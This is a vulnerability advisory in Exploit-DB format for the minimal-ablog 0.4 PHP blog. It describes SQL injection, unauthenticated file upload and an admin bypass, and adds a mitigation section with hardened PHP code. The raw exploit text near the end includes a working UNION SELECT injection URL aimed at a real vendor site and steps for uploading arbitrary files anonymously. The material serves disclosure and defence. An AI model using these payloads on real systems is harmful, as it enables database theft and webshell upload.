Vendor: minimal-ablog
By: NoGe
CVSS: 7.5 (HIGH)
Title: SQL Injection, File Upload and Admin Bypass
CWE: 89, 434, 285
Product Name: minimal-ablog
Affected Version From: 0.4
Affected Version To: 0.4
Patch Exists: No
Related CWE: N/A
CPE: a:abweb:minimal-ablog
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

minimal-ablog 0.4 SQL Injection, File Upload and Admin Bypass Vuln

The id parameter of index.php is placed into an SQL query without sanitization, so a crafted value injects attacker-controlled SQL into the database query. admin/uploader.php is reachable without logging in and accepts arbitrary file uploads (stored under img/), which both allows malicious files to be uploaded and bypasses the admin login, giving the visitor admin privileges.

Mitigation:

Validate user input such as the id parameter of index.php and pass it to SQL through parameterized queries rather than string concatenation. Require authentication before any admin page, including admin/uploader.php, is served, and restrict what the uploader will accept and where it stores files.
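The following PHP is an added example of those two mitigations, not code from minimal-ablog or from the advisory author. It assumes a PDO connection, a posts table with id/title/body columns, a session flag named is_admin, and that uploads are stored under img/; all of those names are assumptions chosen for illustration.

```php
<?php
// Added example (not minimal-ablog's own code): hardened handling for the two
// issues in the advisory. Table and column names (posts, id, title, body),
// the session key 'is_admin' and the upload directory are assumptions.

declare(strict_types=1);

// ---- index.php: parameterised lookup instead of interpolating ?id= ----
function fetchPost(PDO $db, string $rawId): ?array
{
    // Reject anything that is not a positive integer before it reaches SQL.
    if (!preg_match('/^[1-9][0-9]*$/', $rawId)) {
        return null;
    }
    $stmt = $db->prepare('SELECT id, title, body FROM posts WHERE id = :id');
    $stmt->bindValue(':id', (int) $rawId, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// ---- admin/uploader.php: require a login, then constrain the upload ----
function requireAdmin(): void
{
    if (session_status() !== PHP_SESSION_ACTIVE) {
        session_start();
    }
    // Assumed session flag; set it only after a successful admin login.
    if (empty($_SESSION['is_admin'])) {
        http_response_code(403);
        exit('Login required');
    }
}

// Content types the uploader may accept, mapped to the extension we assign.
const ALLOWED_TYPES = [
    'image/png'  => 'png',
    'image/jpeg' => 'jpg',
    'image/gif'  => 'gif',
];

function storeUpload(array $file, string $uploadDir): ?string
{
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK
        || !is_uploaded_file($file['tmp_name'])) {
        return null;
    }
    // Decide the type from the file contents, not from the client-supplied
    // filename or Content-Type.
    $finfo = new finfo(FILEINFO_MIME_TYPE);
    $mime  = $finfo->file($file['tmp_name']);
    if (!isset(ALLOWED_TYPES[$mime])) {
        return null;
    }
    // Server-chosen name: no path traversal, no script extension, no
    // double extension carried over from the original filename.
    $name = bin2hex(random_bytes(16)) . '.' . ALLOWED_TYPES[$mime];
    $dest = rtrim($uploadDir, '/') . '/' . $name;
    if (!move_uploaded_file($file['tmp_name'], $dest)) {
        return null;
    }
    chmod($dest, 0644);
    return $name;
}

// Usage in admin/uploader.php (assumed layout):
//   requireAdmin();
//   $saved = storeUpload($_FILES['file'] ?? [], __DIR__ . '/../img');
// Usage in index.php:
//   $post = fetchPost($db, $_GET['id'] ?? '');
```

The auth check runs before any upload handling, so the uploader can no longer be reached anonymously; the upload path discards the client's filename entirely, which removes the route to dropping an executable file. Pair this with a web-server rule that refuses to execute scripts from the img/ directory, so a bypass of the type check still cannot yield code execution.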

Exploit-DB raw data:

===========================================================================================================


  [o] minimal-ablog 0.4 SQL Injection, File Upload and Admin Bypass Vuln 

       Software : minimal-ablog version 0.4
       Vendor   : http://www.abweb.co.cc/
       Download : http://code.google.com/p/minimal-ablog/downloads/list
       Author   : NoGe
       Contact  : noge[dot]code[at]gmail[dot]com
       Blog     : http://evilc0de.blogspot.com


===========================================================================================================


  [o] Vulnerable file

       index.php
       admin/uploader.php



  [o] Exploit

       [ SQL Injection ]

	    http://localhost/[path]/index.php?id=[SQL]
	    http://www.abweb.co.cc/index.php?id=-3%20union%20select%201,version(),3,4,5,6,7,8--  <=- demo

       [ File Upload ]

	    http://localhost/[path]/admin/uploader.php  <=- upload your file here
	    http://localhost/[path]/img/[your_file]  <=- file will be uploaded here

       [ Admin Bypass ]

	    when you open admin/uploader.php to upload a file, you already have admin privs too :)


===========================================================================================================


  [o] Greetz

       MainHack BrotherHood [ http://serverisdown.org/blog/]
       Vrs-hCk OoN_BoY Paman bL4Ck_3n91n3 loqsa
       H312Y yooogy mousekill }^-^{ kaka11 martfella
       skulmatic OLiBekaS ulga Cungkee k1tk4t str0ke

       GANYANG MALINGSIAL!!! [ http://malingsial.serverisdown.org/ ]

        
===========================================================================================================

# milw0rm.com [2008-11-30]